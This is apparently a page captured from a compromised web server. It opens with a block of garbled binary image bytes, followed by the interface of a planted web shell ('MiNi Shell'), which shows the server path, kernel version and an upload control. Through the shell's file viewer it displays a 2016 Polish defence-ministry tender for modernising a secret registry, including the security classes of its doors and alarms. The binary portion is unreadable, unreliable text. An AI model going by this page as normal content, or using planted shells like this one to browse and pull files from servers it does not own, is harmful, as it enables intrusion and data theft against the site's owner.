JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160427/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160427/47363-N-2016.html

<p class="kh_header"><b>Warszawa: Opracowanie Programu Inwestycji i Dokumentacji Projektowo-Kosztorysowej wraz z pełnieniem nadzoru autorskiego w czasie trwania robót dla zadania: Modernizacja pomieszczeń na potrzeby kancelarii tajnej oraz punktu kontroli informacji niejawnych międzynarodowych w Dębinie -Sprawa 18/2016</b><br>
<b>Numer ogłoszenia: 47363 - 2016; data zamieszczenia: 27.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Stołeczny Zarząd Infrastruktury , Al. Jerozolimskie 97, 00-909 Warszawa, woj. mazowieckie, tel. 022 6840328, faks 022 8250803, 6846704.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szi.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna MON.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie Programu Inwestycji i Dokumentacji Projektowo-Kosztorysowej wraz z pełnieniem nadzoru autorskiego w czasie trwania robót dla zadania: Modernizacja pomieszczeń na potrzeby kancelarii tajnej oraz punktu kontroli informacji niejawnych międzynarodowych w Dębinie -Sprawa 18/2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie :
kompleksowego przygotowania dokumentacyjnego zadania tj.: wykonanie programu inwestycji w oparciu o zatwierdzone minimalne wojskowe wymagania  organizacyjno-użytkowe i kompletnej dokumentacji projektowo-kosztorysowej wraz z uzyskaniem niezbędnych uzgodnień  i decyzji administracyjnych w oparciu o uszczegółowiony na etapie PI  zakres rzeczowy zadania.

Zakres prac projektowych obejmuje zgodnie z opracowanymi MWWO-U wykonanie robót w branżach: budowlanej (roboty murarskie, malarskie i tynkarskie) elektrycznej, i teletechnicznej.
W celu modernizacji pomieszczeń nr 19-23 na potrzeby funkcjonowania kancelarii tajnej oraz PKINM konieczne jest m.in. wykonanie następujących robót:
- wymiana 3 kpl. drzwi wejściowych na 3 kpl. spełniające wymagania klasy odporności nie niższej niż RC 4 określone w Polskiej Normie PN-EN 1627
- wymiana 4 krat zabezpieczających okna w pomieszczeniach nr 20-23 
- wstawienia okna z szybą wenecką pomiędzy pomieszczeniami nr 20 i 21 
- wykonanie w pomieszczeniu nr 20 ścianki z drzwiami - przepierzenie z PCV z szybami nieprzeźroczystymi
- instalacja SSWiN klasy SA 4 (centralę alarmową i inne urządzenia nadzorujące i rejestrujące pracę SSWiN zamontować w pomieszczeniu sił ochronnych SUFO)
- zlokalizowanie LCN na wartowni w budynku nr 12, w pomieszczeniu nr 7 a dublujący LCN na obiekcie technicznym w budynku nr 18 pomieszczenie nr 14
- instalacja systemu sygnalizacji pożarowej
- instalacja telewizyjnego systemu nadzoru i wideodetekcji
- instalacja na zewnątrz pomieszczenia nr 19 wideodomofonu szerokokątnego
- instalacja wewnątrz pomieszczenia nr 19 przy drzwiach wejściowych przycisku wyjścia ze strefy ochronnej
- instalacja wewnątrz i na zewnątrz pomieszczenia nr 21 systemu KD
- instalacja na wejściu do pomieszczenia nr 20 wideodomofonu szerokokątnego
- instalacja rejestracji wejść i wyjść z pomieszczenia 20/21 SKD w pomieszczeniu nr 7 gdzie znajduje się LCN
- wyposażenie kancelarii tajnej w szafy do przechowywania dokumentów i materiałów niejawnych klasy C, B i A, pojemniki lub worki do przechowywania dokumentów niejawnych przeznaczonych do zniszczenia oraz niszczarkę;

Szczegółowy zakres prac ujęto w opracowanych wojskowych wymaganiach organizacyjno - użytkowych (MWWOU) do wglądu w siedzibie Zamawiającego po uprzednim telefonicznym uzgodnieniu terminu z p. Marią PAWLAK nr tel. 261 846 701)- dokument dostępny na etapie SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>W przedmiotowym postępowaniu zamawiający nie przewiduje udzielenie zamówień uzupełniających  na podstawie art. 67 ust.1 pkt 7 ustawy Prawo zamówień publicznych</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 150.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagane wadium: 4 000,00 zł  - na etapie składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda złożenia następujących dokumentów:
a) Oświadczenia w FORMULARZU WNIOSKU, iż firma/y biorące  udział w postępowaniu posiadają: kancelarię tajną lub inną niż kancelaria tajna, komórkę wewnętrzną odpowiedzialną za właściwe rejestrowanie, przechowywanie, obieg i wydawanie materiałów niejawnych uprawnionym osobom, zorganizowaną i zabezpieczoną zgodnie z rozporządzeniem Rady Ministrów z dnia 29 maja 2012 r. w sprawie środków bezpieczeństwa fizycznego stosowanych do zabezpieczenia informacji niejawnych (Dz. U. z 2012 r., poz. 683) - dla wszystkich członków konsorcjum, uczestników postępowania. 
b)	Świadectwo Bezpieczeństwa Przemysłowego pierwszego stopnia potwierdzające zdolność Wykonawcy do ochrony informacji niejawnych o klauzuli POUFNE lub wyższej - ważnego co najmniej sześć miesięcy licząc od daty podpisania umowy - zgodnie z wymogami ustawy z dnia 05.08.2010 r.  O ochronie informacji niejawnych (Dz.U. z 2010 r. nr 182 poz. 1228).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda złożenia następujących dokumentów:
a) wykaz wykonanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenie działalności jest krótszy - w tym okresie, co najmniej 1 pracę projektową w zakresie projektowania elektronicznych systemów teletechnicznych w obiektach użyteczności publicznej o wartości co najmniej 80.000,00 zł brutto (jedna), z podaniem wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których  zostały wykonane (wzór wykazu - załącznik nr 3) oraz z załączeniem dowodów, czy zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda złożenia następujących dokumentów:
a) Oświadczenie (wzór - załącznik nr 2).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda złożenia następujących dokumentów:
a) wykaz osób które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych , doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informację o podstawie do dysponowania tymi osobami (wzór - załącznik nr 4). Do wykazu, dla każdej osoby wymienionej w Wykazie (załączniku nr 4)  należy załączyć wszystkie niżej wymienione dokumenty (podpunkt od b) do d)    
b) poświadczenia bezpieczeństwa  upoważniające do dostępu do informacji niejawnych o klauzuli POUFNE lub wyższej dla: osób które będą uczestniczyć w wykonywaniu zamówienia (wymienionych w Wykazie osób - załącznik nr 4), Kierownika kancelarii niejawnej oraz Pełnomocnika ds. ochrony informacji niejawnych (wymienionych we Wniosku o dopuszczenie do udziału w postępowaniu),
c) aktualne zaświadczenia stwierdzające odbycie szkolenia w zakresie ochrony informacji niejawnych dla osób które będą uczestniczyć w wykonywaniu zamówienia (wymienionych w Wykazie osób - załączniku nr 4), Kierownika kancelarii niejawnej oraz Pełnomocnika ds. ochrony informacji niejawnych (wymienionych we Wniosku o dopuszczenie do udziału w postępowaniu)
d) oświadczenie (wzór - załącznik nr 5), o posiadaniu uprawnień do projektowania bez ograniczeń dla osób które będą uczestniczyć w wykonywaniu zamówienia, w specjalnościach: 
- architektoniczna bez ograniczeń,
- konstrukcyjno-budowlana bez ograniczeń,
- instalacyjna w zakresie instalacji i urządzeń elektrycznych bez ograniczeń
- instalacyjna w zakresie instalacji i urządzeń telekomunikacyjnych bez ograniczeń
e) projektanci specjalności zabezpieczenia technicznego biorący udział w realizacji przedmiotu zamówienia muszą posiadać, oprócz dokumentów zawartych w punkcie b) i c) dodatkowo: 
- zaświadczenie o wpisie na listę kwalifikowanych pracowników zabezpieczenia technicznego,
- świadectwo/autoryzacja ukończenia kursów w zakresie projektowania systemów alarmowych klasy SA-3 (SA-4) zgodnie z normą obronną NO-04-A004.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda złożenia następujących dokumentów:
a) Oświadczenie (wzór - załącznik nr 2).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>wykaz wykonanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenie działalności jest krótszy - w tym okresie, co najmniej 1 pracę projektową w zakresie projektowania elektronicznych systemów teletechnicznych w obiektach użyteczności publicznej o wartości co najmniej 80.000,00 zł brutto (jedna), z podaniem wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których  zostały wykonane (wzór wykazu - załącznik nr 3) oraz z załączeniem dowodów, czy zostały wykonane należycie. 

Zamawiający na podstawie art. 24 ust. 2a ustawy Pzp wykluczy z postępowania o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem postępowania w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. 
Zamawiający nie wykluczy z postępowania o udzielenie zamówienia wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszeniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wniosek(załącznik nr 1); 
2. Poświadczenia bezpieczeństwa dla Kierownika kancelarii niejawnej oraz Pełnomocnika ds. ochrony informacji niejawnych
3. Aktualne zaświadczenia stwierdzające odbycie szkolenia w zakresie ochrony informacji niejawnych dla Kierownika kancelarii niejawnej oraz Pełnomocnika ds. ochrony informacji niejawnych; 
4. Wykaz osób które będą uczestniczyć w wykonywaniu zamówienia - Załącznik nr 4 
5. Oświadczenie o posiadaniu uprawnień do projektowania bez ograniczeń dla osób które będą uczestniczyć w wykonywaniu zamówienia wymienionych w Wykazie - Załącznik nr 5 
6. Poświadczenia bezpieczeństwa o klauzuli POUFNE lub wyższej dla osób które będą uczestniczyć w wykonywaniu zamówienia wymienionych w Wykazie - Załączniku nr 4
7. Aktualne zaświadczenia stwierdzające odbycie szkolenia  w zakresie ochrony informacji niejawnych dla osób które będą uczestniczyć w wykonywaniu zamówienia wymienionych w Wykazie - Załączniku nr 4 
8. Zaświadczenia o wpisie na listę kwalifikowanych pracowników zabezpieczenia technicznego dla projektantów specjalności zabezpieczenia technicznego wymienionych w Wykazie - Załączniku nr 4 
9. Świadectwa ukończenia kursu w zakresie projektowania systemów alarmowych klasy SA-3 (SA-4) dla projektantów specjalności zabezpieczenia technicznego wymienionych w Wykazie - Załączniku nr 4 
10. Zobowiązanie podmiotu trzeciego (jeżeli dotyczy)
11. Dowód wpłaty wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 20.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>1.	Za wymagane prawidłowo wykonane 1 zamówienie polegające na wykonaniu pracy projektowej w zakresie projektowania elektronicznych systemów teletechnicznych w obiektach użyteczności publicznej na kwotę co najmniej 80.000,00 zł. brutto (potwierdzone np. referencjami lub innym dokumentem)  - Wykonawca otrzyma 10 pkt.
2.	Za każde następne wykonane zamówienie polegające na wykonaniu pracy projektowej w zakresie projektowania elektronicznych systemów teletechnicznych w obiektach użyteczności publicznej na kwotę co najmniej 80.000,00 zł. brutto (potwierdzone np. referencjami lub innym dokumentem) Wykonawca otrzyma po 5 punktów.
3.	Punktacja wniosków:
a)	punktacji nie będą podlegały dowody np. referencje uzyskane przez Wykonawcę w wyniku użyczenia doświadczenia przez inną firmę. Z zasobów podmiotów trzecich w trybie art. 26 ust. 2b ustawy PZP korzystać można wyłącznie na potrzeby wykazania spełnienia minimalnych warunków udziału w postępowaniu. W takim przypadku zamawiający uzna za spełnione minimalne warunki udziału w postępowaniu, ale przyzna 0 (zero) punktów, co spowoduje że:
b)	w przypadku złożenia mniej niż 20 wniosków o udział w postępowaniu, Wykonawca zostanie zaproszony do złożenia oferty;
c)	w przypadku złożenia więcej niż 20 wniosków o udział w postępowaniu, Wykonawca nie zostanie zaproszony do złożenia oferty.
d)	w przypadku, gdy dwóch lub więcej Wykonawców uzyska równą ilość punktów, decydujące znaczenie dla kwalifikacji będzie miała łączna wartość opracowań spełniająca wymogi określone w punkcie 1.
e)	zamawiający nie będzie wzywał do uzupełnienia dokumentów dotyczących pozostałych opracowań uwzględnionych w wykazie, za które Wykonawca może uzyskać dodatkowe punkty, jeśli te dokumenty nie zostaną dołączone do wniosku o dopuszczenie do udziału w postępowaniu lub będą zawierać błędy lub jeśli z dołączonych dokumentów nie będzie wynikało, że opracowania te spełniają wymogi określone przez zamawiającego w niniejszym ogłoszeniu.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.9</li>
<li>2 - termin wykonania - 0.1</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie możliwość zmiany  postanowień umowy na podstawie 
art. 144 ustawy Pzp w zakresie:
- zmiany danych dotyczących stron umowy, jak zmiana nazwy (jeśli nie oznacza przekształcenia podmiotowego lub przedmiotowego) siedziby, adresu, numeru konta bankowego np. w przypadku zmian wpisów w ewidencji działalności gospodarczej lub KRS; 
- zmiany osób upoważnionych, jako przedstawiciele Stron, itp. w przypadku nieprzewidzianych zdarzeń losowych m.in. takich jak choroba, śmierć, ustanie stosunku pracy; 
- zmiany terminu  wykonania przedmiotu umowy, gdy wynikną niżej wymienione okoliczności:
a) wstrzymania realizacji prac przedprojektowych i projektowych przez Zamawiającego z przyczyn leżących po stronie Zamawiającego-termin wykonania u mowy może ulec przesunięciu o okres nie dłuższy niż okres wstrzymania prac,
b) wystąpienia okoliczności niezależnych od Wykonawcy lub których Wykonawca  przy zachowaniu  należnej staranności nie był w stanie uniknąć lub przewidzieć, jak również inne przeszkody lub utrudnienia w wykonaniu przedmiotu umowy spowodowane przez osobę trzecią (np.: instytucje i organy administracji państwowej oraz inne instytucje, w tym wojskowe, biorące udział w realizacji 
przedmiotu zamówienia) lub wyższej (zdarzenia, którego nie można było przewidzieć, któremu nie można było zapobiec, ani któremu  nie można było przeciwdziałać, a które uniemożliwia Wykonawcy wykonanie w całości lub części jego zobowiązań)- o czas działania siły wyższej oraz czas potrzeby do usunięcia skutków jej działania oraz usunięciu przeszkód,
c) konieczności skoordynowania prac przedprojektowych i projektowych z innymi pracami w obiekcie lub dotyczącymi obiektu (realizowanymi na etapie dokumentacji lub robót budowlanych).
d) zmiany inne w przypadku zmian w  ustawach i rozporządzeniach, które nastąpiły po dniu otwarcia ofert oraz na skutek innych przyczyn związanych z realizacją przedmiotu zamówienia, a niezależnych od Stron, np. związanych z nieuregulowanym stanem prawnym  nieruchomości.
- zmiana finansowania/ wynagrodzenia zamówienia na skutek ewentualnego braku płynności finansowania robót lub zmiany wielkości limitu finansowego określonego w zatwierdzonym Centralnym Planie Inwestycji Budowlanych resortu Obrony Narodowej na dany rok budżetowy, tj. zmian, które nastąpiły po dniu podpisania umowy, a także jeśli zajdzie potrzeba wprowadzenia dokumentacji zamiennej lub uzupełniającej.
- na żądanie Zamawiającego, Wykonawca musi przerwać realizację przedmiotu umowy w obiekcie.
- zmiany podwykonawcy lub wprowadzenia podwykonawcy (w sytuacji, gdy wykonawca w ofercie zadeklarował realizację siłami własnymi) za wyraźną zgodą Zamawiającego oraz na warunkach określonych w SIWZ. 
Zmiany w wyżej opisanym zakresie mogą być dokonane w zawartej umowie wyłącznie w formie pisemnej, w postaci aneksu do umowy, pod rygorem nieważności wprowadzonych zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szi.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Strona internetowa www.szi.wp.mil.pl lub 
